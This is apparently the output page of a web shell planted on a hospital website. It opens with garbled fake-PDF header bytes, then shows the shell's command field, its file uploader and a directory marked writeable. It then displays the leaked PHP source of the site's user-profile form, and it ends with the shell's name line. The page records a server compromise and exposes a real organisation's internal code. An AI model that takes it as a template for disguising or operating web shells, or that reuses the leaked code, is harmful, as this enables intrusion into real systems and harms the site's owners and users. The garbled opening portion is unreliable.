%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/incident/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/incident/application/views/profile.php
<div class="wrapper d-flex align-items-stretch"> 

<?php include('_parts/sidebar.php') ?>
      <div id="content">
      <?php include('_parts/user_internal_header.php') ?>
 <div class="main-body">
         <div class="headings">
		
					<h4><?php echo htmlentities($row['fullName']);?>'s
                Profile</h4> 
                    </div>
                      <div class="white-box">
        <div class="form1">
            <div class="form-panel">


              <?php if($_GET['msg'])
                      {?>
              <div class="alert alert-success alert-dismissable">
                <button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
                <b>Well done!</b> Profile updated successfully</div>
              <?php }?>

              <?php if($errormsg)
                      {?>
              <div class="alert alert-danger alert-dismissable">
                <button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
                <b>Oh snap!</b> </b> <?php echo htmlentities($errormsg);?></div>
              <?php } if(!empty($error_array)) { foreach($error_array as $row) { ?>
			  <div class="alert alert-danger alert-dismissable">
                <button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
               <?php echo htmlentities($row);?></div>
			  <?php } }?>
            
              <h6><b>Last Updated at :</b>&nbsp;&nbsp;<?php echo htmlentities($row['updationDate']);?></h6>
              <form id="form" class="form-horizontal style-form" method="post" name="profile" enctype="multipart/form-data">

				<ul>
					<li>
						<label>Full Name <span style="color:red;">*</span></label>
						<input type="text" id="fullname" name="fullname" maxlength="100"
						  value="<?php echo htmlentities($row['fullName']);?>" class="form-control">
						<span id="fullname_validation" style="font-size:12px;color:red;"></span>
	  
					</li>
					<li> 
						<label>User Email <span style="color:red;">*</span></label>

						<input type="email" name="useremail" required="required"
						  value="<?php echo htmlentities($row['userEmail']);?>" class="form-control" readonly>
					</li>
					<li>
						<label>Programme Name <span style="color:red;">*</span></label>

						<input type="text" id="programmename" name="programmename" maxlength="30"
						  value="<?php echo htmlentities($row['programme_name']);?>" class="form-control">
						  <span id="programmename_validation" style="font-size:12px;color:red;"></span>
					</li>
					<li>
						  <label>Academic Year <span style="color:red;">*</span></label>
         
						<input type="text" id="acadyear" name="academicyear" maxlength="4" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"
                      value="<?php echo htmlentities($row['academic_year']);?>" class="form-control" >
                      <span id="acadyear_validation" style="font-size:12px;color:red;"></span>
					</li>
					<li>
						<label>System ID <span style="color:red;">*</span></label>
    
						<input type="text" maxlength="15"
                      value="<?php echo htmlentities($row['enrollment_no']);?>" class="form-control" readonly>
                      <span id="enrollment_validation" style="font-size:12px;color:red;"></span>
					</li>
					<li>
						<label>Mobile Number</label>
						<input type="text" id="contactno" name="contactno" maxlength="10" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"
						  value="<?php echo htmlentities($row['contactNo']);?>" class="form-control">
						  <span id="contactno_validation" style="font-size:12px;color:red;"></span>
					</li>
					<li>
						<label>Address </label>
						<textarea id="address" name="address" maxlength="200" type="text"
						  class="form-control"><?php echo htmlentities($row['address']);?></textarea>
						  <span id="address_validation" style="font-size:12px;color:red;"></span>
					</li>
					<li>
						<label >Pincode</label>
			
						<input type="text" id="pincode" name="pincode" maxlength="6" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"
						  value="<?php echo htmlentities($row['pincode']);?>" class="form-control">
						  <span id="pincode_validation" style="font-size:12px;color:red;"></span>
					</li>
					<li>  
						<label >Reg Date </label>
						<input type="text" name="regdate" required="required"
                      value="<?php echo htmlentities($row['regDate']);?>" class="form-control" readonly>
					  
					 </li>
					 <li>    
						<label>User Photo</label>
						<?php $userphoto=$row['userImage'];
						if($userphoto!=""){
						?>
						
						<input type="hidden" name="old_image" id="old_image" value="<?=$row['userImage']?>" />
						<?php } ?>
						<img src="<?=base_url('attachments/userimages/'.$userphoto)?>" width="90" height="100">
						<input type="file" name="userImage" id="userImage" value="" />
					</li> 
					<li> 
						<button onclick="return doSubmit();" type="submit" name="submit" value="submit" class="btn button5">Submit</button>
					</li>
				</ul>
              </form>
            </div>

        </div>
        </div>

</div>

      </div>
    </div>
<script src="<?=base_url('assets/js/popper.js'); ?>"></script>
<script src="<?=base_url('assets/js/main.js'); ?>"></script>

Kontol Shell Bypass